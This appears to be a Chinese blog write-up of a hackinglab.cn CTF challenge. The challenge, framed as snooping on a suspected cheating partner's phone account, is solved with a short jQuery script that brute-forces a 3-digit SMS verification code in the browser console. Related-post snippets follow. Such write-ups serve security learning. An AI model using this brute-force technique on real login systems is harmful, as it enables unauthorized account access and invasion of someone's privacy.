hackinglab.cn脚本关之十

最新推荐文章于 2021-03-09 17:34:34 发布
最新推荐文章于 2021-03-09 17:34:34 发布
阅读量2.2k 收藏
点赞数
分类专栏: hackinglab.cn-题解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kostart123/article/details/53763173
版权

题目:

Tips:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:13388886666


writeup:

  1. 打开题目链接是一个输入验证码提交的题目,点击获取验证码
    手机验证码是:验证码发到手机上了,你看不到..是3位纯数字,开头不为0

    看来是要暴力破解了。。。
  2. 破解之前要先知道表单的字段,查看源代码
    <html>
    <head>
        <meta http-equiv="content-type" content="text/html;charset=utf-8">
        <script src="../jquery-2.0.3.js"></script>
    </head>
    <body>
        请使用手机短信验证码登陆
        <br>Tips:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟!
        <br>闺蜜手机号码:13388886666
    	<form action="login.php" method="POST">
            Phone: <input type="text" value="13388886666" name="username" id="username"><br>
            Vcode: <input type="text" value="" name="vcode"><br>
            <a href="#" class="getcode">点击获取手机验证码</a>
            <input type="submit" value="submit" name="Login"><br>
        </form>
    </body>
</html>
<script>
    $(".getcode").click(function(){
    var url="./vcode.php";
        $.post(url,{'getcode':'1','mobi':$("#username").val()},function(data){
            alert("手机验证码是:"+data);
	    });
    });
</script>


  3. 可以用工具或脚本破解,这里由于数位不多我直接用js写了个脚本(网页中包含了jquery库,可以利用)
    var getKey=function(phone){//phone指登陆号码
	var i=100;
	while(i<1000){
		$.post('login.php',{username:phone,vcode:''+i},function(data){
			if(data.indexOf('error')==-1) alert(data);
		});
		i++;
	}
}

  4. 打开web控制台粘贴上面的代码回车,然后执行函数
    你伤心的发现他/她正在跟你的前男/女友勾搭.....于是下决心看看前任除了跟你的(男/女)闺蜜勾搭,是不是还跟别的勾搭..<br>前任的手机号码是:13399999999

    会弹出这个结果。那么换上新号码在执行函数
    key is LKK8*(!@@sd

    弹出结果,获得key。

注意:用的ajax,破解时发的请求多可能会卡但只有一小会儿。

r00tnb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF writeup 1_网络安全实验室
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
黑客是如何发现女朋友出轨的
黑马程序员官方博客
09-22 3165
程序猿们女友来之不易,且行且珍惜! 作为一个不合格的乌云白帽子,下边只是冰山一角吧。但如果你是异地,那这也许是最好的教材。 事情一开始是这样,我和GF异地接近一年了,GF有两个号码,有一个是我给她买的,另一个是自己买的。 有一天我突然感觉我俩每天的日常通话时间越来越短,从一开始每天半小时左右下降到了隔两天一两分钟,妹子说忙。但我感觉也许可能
CTF-网络信息安全攻防学习平台(脚本关)
凝聚力安全团队
07-02 3493
脚本关第一关 题库地址:http://hackinglab.cn 第一关 题目:         key又又找不到了         key分值: 200         key小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没
cn:英雄联盟粉丝站专用脚本
07-07
英雄联盟粉丝站 英雄联盟粉丝站 英雄联盟粉丝站专用脚本 脚本均为网上收集,方便大家下载而做了这样一个合集 如果你觉得这些脚本有用或者遇到了问题,请加入我们的QQ群21422249/397773763或者前往我们的论坛参与讨论 Welcome to the League Of Legend Fans Club For Chinese Feel free to get the assemblies here It's all collected from the L# Forum and shere for free If you get some troubles,visit us at ,or you can contact me at
如何快速在Github找到你想要的东西?这6条寻宝指南请收下
实验楼
12-27 5760
图:内容概览。注:本文内容由实验楼搜集、整理自Github,实际项目版权归原作者所有。找房子、找保姆、找装修......在Github是不行的,但是:找Demo,找构架,...
btsnooz.py脚本
06-16
脚本用于从安卓bug report文件中提取蓝牙日志。一种生成btsnoop_hci.log的方法。
JScript.Encode 脚本在线解密 代码
10-30
JScript.Encode 脚本在线解密代码知识点 JScript.Encode 脚本在线解密代码概述 JScript.Encode 脚本在线解密代码是一种使用 JavaScript 编写的脚本解密工具,旨在帮助用户快速解密 JScript.Encode 加密的脚本代码...
基于Node.js脚本的简易系统操作的框架.zip
03-15
基于Node.js脚本的简易系统操作的框架.zip基于Node.js脚本的简易系统操作的框架.zip 基于Node.js脚本的简易系统操作的框架.zip基于Node.js脚本的简易系统操作的框架.zip 基于Node.js脚本的简易系统操作的框架.zip...
Centos7/8下.vimrc脚本固定格式配置
04-14
Centos7/8下.vimrc脚本固定格式配置
hackinglab 脚本关 writeup
xaphoenix的博客
05-28 3176
key又又找不到了先点开通关地址 之后点击这个链接,拦截它的response,可以得到key 快速口算写个脚本就行了。利用正则来提取相关信息。import requests import re url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php' header = {'Cookie':
闺蜜说,
kaiyekai的专栏
11-29 747
<br />嗯,要是洒脱的人,这会儿早在国外了<br /> <br />哎!放手一搏!
hackinglab.cn脚本关之三
r00tnb的博客
12-17 1117
题目: Tips:这个题目真不是随便设置的。什么才是空的呢?通关地址:没有,请直接提交答案(小写即可) writeup: 说实话,才开始看到确实有点蒙蔽,不过仔细一想挺简单的,就是null嘛,提交后回答正确!!
hackinglab-脚本关8——微笑一下就能过关了
Ifish的博客
07-23 1569
微笑一下就能过关了 题目描述 解题思路 1、点开题, 查看源码 发现有个源码链接,打开 2、代码审计 (1)不可以提交^_^ (2)不可以包含“.”、“%”、“0-9的数字”、“%”、“http”、“https”、“ftp”、“telnet”、“%” (3)不可以包含“_” (4)不可以存在文件,但文件的内容要是(●’◡’●) 3、这道题基本上就是在考PH...
HackingLab 综合关
4ct10n
12-21 3427
第一关1.首先注册账号 然后让你注册手机号,但是题目提示源码中有内部人员的手机号 于是查看源代码号码为13388453871 通过burpsuit发现该请求有三个字段 于是绑定成功,想想我们将该手机号绑在了admin的账号上。下一步就很明显了,利用查找密码功能找回admin密码。 2.利用Forgetpassword? 通过用户名:admin;密码:XXXXXXXX 登录进去 即可
hackinglab-脚本关5——逗比验证码第一期
Ifish的博客
07-23 1463
逗比验证码第一期 题目描述 解题思路 1、打开发现是一个模拟登陆界面 2、随意输了一个四位纯数字密码,提示密码错误 估计就是要暴力破解了,刚才题目又提示验证码有没有都一样,所以应该是可以绕过 3、抓包 发现这个验证码可以只输一次,不过期 所以爆破 4、使用burp suite的Intruder 5、添加爆破的变量 6、设置密码的范围 7、...
hackinglab.cn脚本关之一
r00tnb的博客
12-17 1653
题目: 小明这次哭了,key又找不到了!!!key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!! writeup: 点击进去出现:_到这里找key__ 这是一个链接,再次点击:想找key,从哪里来回哪里去,我这里没有key!哼! 看来不在这,查看一下第一次网页的源代码: _到这里找key__
hackinglab脚本
weixin_42075643的博客
03-09 461
1、key又又找不到了 打开链接,里边有个跳转,产看源代码: 发现一个界面一闪而逝,所以拦住(bp哦)它,看看有啥玄机: 查看源码,果然在这: 2、快速口算 这个题肯定不是手算啦,写个python脚本即可: import requests import re url='http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php' s= requests.Session() r=s.get(url) r.encodin
hackinglab-脚本关15——Principle很重要的XSS
Ifish的博客
07-31 857
Principle很重要的XSS 题目描述 解题思路 用上一道题的payliad即可得到答案alert’onmouseover=alert(HackingLab)&gt; 但是这道题最神奇的一点是,单看题的时候感觉会有一些难度,但是像上一道题那样一下下排查下来,却发现和上一道题没有什么太大的区别,可能是我没有弄清出题者的思路。...
是你的始终是你的
tmj_159的专栏
02-26 158
        “是你的东西怎么都是你的,不是你的东西怎么强求都不是你的”           现在很多人都有这样的想法,特别是面对爱情的时候。表面上看起来淡然,但是我认为说这话其实对无法获得的事物的一种无奈的情绪,这是一种消极的情绪。当东西自己得到,”你看,我说了这是我的东西跑不掉的吧!”,当东西成别人的了,“我说了注定不是我的东西,我是得不到的吧!“,正反两边的话都说了,好聪明。  ...
mpv 运行node.js脚本
最新发布
04-28
mpv是一个开源的媒体播放器,它支持多种音视频格式,并且具有丰富的功能和可定制性。...请注意,mpv的脚本扩展功能是通过Lua脚本实现的,因此你需要使用Lua来编写一个脚本,该脚本将调用Node.js脚本并与mpv进行交互。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值